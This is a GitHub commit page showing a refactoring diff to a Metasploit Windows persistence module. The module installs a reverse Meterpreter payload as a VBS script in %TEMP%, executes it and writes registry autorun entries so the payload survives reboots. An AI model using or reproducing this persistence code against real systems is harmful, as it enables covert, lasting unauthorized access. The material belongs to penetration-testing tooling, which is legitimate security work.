Skip to content

Commit

Permalink
Merge pull request #2 from jvazquez-r7/persistence_vbs
Browse files Browse the repository at this point in the history
using Post::File methods plus little more cleanup
  • Loading branch information
darkoperator committed Feb 12, 2013
2 parents 7485e42 + 42a6d96 commit 091322f
Showing 1 changed file with 4 additions and 24 deletions.
28 changes: 4 additions & 24 deletions modules/exploits/windows/local/persistence.rb
Original file line number Diff line number Diff line change
Expand Up @@ -26,11 +26,10 @@ def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Persistent Payload Installer',
'Description' => %q{
This Module will create a boot persistent reverse Meterpreter session by
This Module will create a boot persistent reverse Meterpreter session by
installing on the target host the payload as a script that will be executed
at user logon or system startup depending on privilege and selected startup
method.
},
'License' => MSF_LICENSE,
'Author' =>
Expand All @@ -54,8 +53,7 @@ def initialize(info={})

end

# Exploit Method for when run command is issued
#-------------------------------------------------------------------------------
# Exploit Method for when exploit command is issued
def exploit
print_status("Running module against #{sysinfo['Computer']}")

Expand Down Expand Up @@ -114,20 +112,7 @@ def exploit
)
end

# Creates persistent script
#-------------------------------------------------------------------------------
def create_script(delay, altexe)
if not altexe.nil?
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay})
end
print_status("Persistent agent script is #{vbs.length} bytes long")
return vbs
end

# Function for creating log folder and returning log path
#-------------------------------------------------------------------------------
def log_file(log_path = nil)
#Get hostname
host = session.sys.config.sysinfo["Computer"]
Expand All @@ -151,18 +136,15 @@ def log_file(log_path = nil)
end

# Writes script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs,name)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = expand_path("%TEMP%")
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else
tempvbs = tempdir + "\\" + name + ".vbs"
end
begin
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
fd.close
write_file(tempvbs, vbs)
print_good("Persistent Script written to #{tempvbs}")
@clean_up_rc << "rm #{tempvbs}\n"
rescue
Expand All @@ -174,7 +156,6 @@ def write_script_to_target(vbs,name)
end

# Executes script on target and return the PID of the process
#-------------------------------------------------------------------------------
def target_exec(script_on_target)
execsuccess = true
print_status("Executing script #{script_on_target}")
Expand All @@ -193,7 +174,6 @@ def target_exec(script_on_target)
end

# Installs payload in to the registry HKLM or HKCU
#-------------------------------------------------------------------------------
def write_to_reg(key,script_on_target, registry_value)
# Lets start to assume we had success.
write_success = true
Expand Down

0 comments on commit 091322f

Please sign in to comment.